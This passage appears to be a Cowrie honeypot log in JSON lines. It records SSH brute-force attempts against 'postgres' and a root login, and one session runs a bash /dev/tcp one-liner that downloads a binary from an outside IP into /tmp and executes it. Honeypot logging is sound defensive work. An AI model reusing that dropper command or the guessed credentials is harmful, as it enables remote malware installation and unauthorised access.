tp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-08T18:18:52.327769Z","src_ip":"212.227.235.229","session":"deb9fc1e15ac"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-08T18:18:52.804336Z","src_ip":"212.227.235.229","session":"deb9fc1e15ac"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-08T18:18:52.962801Z","session":"deb9fc1e15ac"}
{"eventid":"cowrie.command.input","input":"nohup bash -c \"exec 6<>/dev/tcp/129.144.180.26/60107 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/qf1ioK8idr && chmod +x /tmp/qf1ioK8idr && /tmp/qf1ioK8idr A4RJcABWnROUGgD4UUz7CQ6bEp1MCmZJlntslUxyFkmUEoMGB/VUUv4BA40agkoJcVaWd3KKQHQCTpwTmQwR90xT/AkanBGaVglzTZ50cpVJdwCEl6+bz84wwno+qAxuZw9ObxJit6Pp7yBC8es=\" &","message":"CMD: nohup bash -c \"exec 6<>/dev/tcp/129.144.180.26/60107 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/qf1ioK8idr && chmod +x /tmp/qf1ioK8idr && /tmp/qf1ioK8idr A4RJcABWnROUGgD4UUz7CQ6bEp1MCmZJlntslUxyFkmUEoMGB/VUUv4BA40agkoJcVaWd3KKQHQCTpwTmQwR90xT/AkanBGaVglzTZ50cpVJdwCEl6+bz84wwno+qAxuZw9ObxJit6Pp7yBC8es=\" &","sensor":"my-vps","timestamp":"2025-09-08T18:18:53.390141Z","src_ip":"8.138.136.155","session":"63fa524c41d3"}
{"eventid":"cowrie.command.input","input":"head -c 1458464 > /tmp/1xSz5b521N","message":"CMD: head -c 1458464 > /tmp/1xSz5b521N","sensor":"my-vps","timestamp":"2025-09-08T18:18:53.393570Z","src_ip":"8.138.136.155","session":"63fa524c41d3"}
{"eventid":"cowrie.command.input","input":"cat /bin/echoQtd#UPX!","message":"CMD: cat /bin/echoQtd#UPX!","sensor":"my-vps","timestamp":"2025-09-08T18:18:53.619012Z","src_ip":"8.138.136.155","session":"63fa524c41d3"}
{"eventid":"cowrie.command.input","input":">yoA@/;'8ELFP;i2","message":"CMD: >yoA@/;'8ELFP;i2","sensor":"my-vps","timestamp":"2025-09-08T18:18:53.624119Z","src_ip":"8.138.136.155","session":"63fa524c41d3"}
{"eventid":"cowrie.command.input","input":"","message":"CMD: ","sensor":"my-vps","timestamp":"2025-09-08T18:18:53.627551Z","src_ip":"8.138.136.155","session":"63fa524c41d3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f53109866e1c6bb9362d687706ca9d77e4375d8802ed59f6437ba5f03d8c2b75","size":1980,"shasum":"f53109866e1c6bb9362d687706ca9d77e4375d8802ed59f6437ba5f03d8c2b75","duplicate":false,"duration":"6.5","message":"Closing TTY Log: var/lib/cowrie/tty/f53109866e1c6bb9362d687706ca9d77e4375d8802ed59f6437ba5f03d8c2b75 after 6.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:18:53.629801Z","src_ip":"8.138.136.155","session":"63fa524c41d3"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:18:53.631001Z","src_ip":"8.138.136.155","session":"63fa524c41d3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":524,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:19:12.257122Z","src_ip":"212.227.235.229","session":"c888183cb231"}
{"eventid":"cowrie.session.closed","duration":180.23469233512878,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:19:12.261939Z","src_ip":"212.227.235.229","session":"c888183cb231"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":43692,"dst_ip":"1.2.3.4","dst_port":22,"session":"62cdb1ead841","protocol":"ssh","message":"New connection: 170.64.157.139:43692 (1.2.3.4:22) [session: 62cdb1ead841]","sensor":"my-vps","timestamp":"2025-09-08T18:19:28.398639Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T18:19:28.399615Z","src_ip":"170.64.157.139","session":"62cdb1ead841"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T18:19:28.653337Z","src_ip":"170.64.157.139","session":"62cdb1ead841"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"test","message":"login attempt [postgres/test] failed","sensor":"my-vps","timestamp":"2025-09-08T18:19:29.417654Z","src_ip":"170.64.157.139","session":"62cdb1ead841"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:19:30.674435Z","src_ip":"170.64.157.139","session":"62cdb1ead841"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:19:33.105947Z","src_ip":"79.124.8.120","session":"6c5776f4bec1"}
{"eventid":"cowrie.session.closed","duration":180.0947802066803,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:19:33.109236Z","src_ip":"79.124.8.120","session":"6c5776f4bec1"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:20:02.167569Z","src_ip":"212.227.235.229","session":"deb9fc1e15ac"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":59318,"dst_ip":"1.2.3.4","dst_port":22,"session":"420ece745623","protocol":"ssh","message":"New connection: 170.64.157.139:59318 (1.2.3.4:22) [session: 420ece745623]","sensor":"my-vps","timestamp":"2025-09-08T18:20:39.723007Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T18:20:39.723981Z","src_ip":"170.64.157.139","session":"420ece745623"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T18:20:40.014650Z","src_ip":"170.64.157.139","session":"420ece745623"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"test123","message":"login attempt [postgres/test123] failed","sensor":"my-vps","timestamp":"2025-09-08T18:20:40.889570Z","src_ip":"170.64.157.139","session":"420ece745623"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:20:42.185173Z","src_ip":"170.64.157.139","session":"420ece745623"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":53100,"dst_ip":"1.2.3.4","dst_port":22,"session":"8ef2670579ab","protocol":"ssh","message":"New connection: 170.64.157.139:53100 (1.2.3.4:22) [session: 8ef2670579ab]","sensor":"my-vps","timestamp":"2025-09-08T18:21:52.524026Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T18:21:52.524823Z","src_ip":"170.64.157.139","session":"8ef2670579ab"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T18:21:52.825595Z","src_ip":"170.64.157.139","session":"8ef2670579ab"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"test321","message":"login attempt [postgres/test321] failed","sensor":"my-vps","timestamp":"2025-09-08T18:21:53.730466Z","src_ip":"170.64.157.139","session":"8ef2670579ab"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:21:55.031237Z","src_ip":"170.64.157.139","session":"8ef2670579ab"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":47880,"dst_ip":"1.2.3.4","dst_port":22,"session":"bc3a42c62291","protocol":"ssh","message":"New connection: 170.64.157.139:47880 (1.2.3.4:22) [session: bc3a42c62291]","sensor":"my-vps","timestamp":"2025-09-08T18:23:08.048053Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T18:23:08.048807Z","src_ip":"170.64.157.139","session":"bc3a42c62291"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T18:23:08.430558Z","src_ip":"170.64.157.139","session":"bc3a42c62291"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"password","message":"login attempt [postgres/password] failed","sensor":"my-vps","timestamp":"2025-09-08T18:23:09.238277Z","src_ip":"170.64.157.139","session":"bc3a42c62291"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:23:10.517970Z","src_ip":"170.64.157.139","session":"bc3a42c62291"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":54548,"dst_ip":"1.2.3.4","dst_port":22,"session":"d6fafe7dc8ac","protocol":"ssh","message":"New connection: 217.72.205.35:54548 (1.2.3.4:22) [session: d6fafe7dc8ac]","sensor":"my-vps","timestamp":"2025-09-08T18:23:18.037566Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:23:18.038680Z","src_ip":"217.72.205.35","session":"d6fafe7dc8ac"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37964,"dst_ip":"1.2.3.4","dst_port":23,"session":"17dbb70c8b23","protocol":"telnet","message":"New connection: 212.227.235.229:37964 (1.2.3.4:23) [session: 17dbb70c8b23]","sensor":"my-vps","timestamp":"2025-09-08T18:24:13.926626Z"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":56896,"dst_ip":"1.2.3.4","dst_port":22,"session":"9709ec5f28c4","protocol":"ssh","message":"New connection: 170.64.157.139:56896 (1.2.3.4:22) [session: 9709ec5f28c4]","sensor":"my-vps","timestamp":"2025-09-08T18:24:21.418209Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T18:24:21.418911Z","src_ip":"170.64.157.139","session":"9709ec5f28c4"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T18:24:21.827822Z","src_ip":"170.64.157.139","session":"9709ec5f28c4"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"passwd","message":"login attempt [postgres/passwd] failed","sensor":"my-vps","timestamp":"2025-09-08T18:24:22.825743Z","src_ip":"170.64.157.139","session":"9709ec5f28c4"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:24:24.154388Z","src_ip":"170.64.157.139","session":"9709ec5f28c4"}
{"eventid":"cowrie.session.closed","duration":31.25810480117798,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:24:45.184660Z","src_ip":"212.227.235.229","session":"17dbb70c8b23"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40264,"dst_ip":"1.2.3.4","dst_port":22,"session":"63609388d216","protocol":"ssh","message":"New connection: 212.227.235.229:40264 (1.2.3.4:22) [session: 63609388d216]","sensor":"my-vps","timestamp":"2025-09-08T18:25:14.495674Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T18:25:14.497329Z","src_ip":"212.227.235.229","session":"63609388d216"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":34902,"dst_ip":"1.2.3.4","dst_port":22,"session":"2675f0cefa8b","protocol":"ssh","message":"New connection: 170.64.157.139:34902 (1.2.3.4:22) [session: 2675f0cefa8b]","sensor":"my-vps","timestamp":"2025-09-08T18:25:33.982273Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T18:25:33.983459Z","src_ip":"170.64.157.139","session":"2675f0cefa8b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T18:25:34.353965Z","src_ip":"170.64.157.139","session":"2675f0cefa8b"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"pass","message":"login attempt [postgres/pass] failed","sensor":"my-vps","timestamp":"2025-09-08T18:25:35.335557Z","src_ip":"170.64.157.139","session":"2675f0cefa8b"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:25:36.663440Z","src_ip":"170.64.157.139","session":"2675f0cefa8b"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":60220,"dst_ip":"1.2.3.4","dst_port":22,"session":"7139e9eea769","protocol":"ssh","message":"New connection: 170.64.157.139:60220 (1.2.3.4:22) [session: 7139e9eea769]","sensor":"my-vps","timestamp":"2025-09-08T18:26:44.984894Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T18:26:44.986164Z","src_ip":"170.64.157.139","session":"7139e9eea769"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T18:26:45.275853Z","src_ip":"170.64.157.139","session":"7139e9eea769"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"P@ssw0rd","message":"login attempt [postgres/P@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-09-08T18:26:46.513547Z","src_ip":"170.64.157.139","session":"7139e9eea769"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:26:47.813098Z","src_ip":"170.64.157.139","session":"7139e9eea769"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:27:14.523745Z","src_ip":"212.227.235.229","session":"63609388d216"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":24920,"dst_ip":"1.2.3.4","dst_port":22,"session":"8414bc767647","protocol":"ssh","message":"New connection: 212.227.235.229:24920 (1.2.3.4:22) [session: 8414bc767647]","sensor":"my-vps","timestamp":"2025-09-08T18:27:15.064713Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T18:27:15.066367Z","src_ip":"212.227.235.229","session":"8414bc767647"}
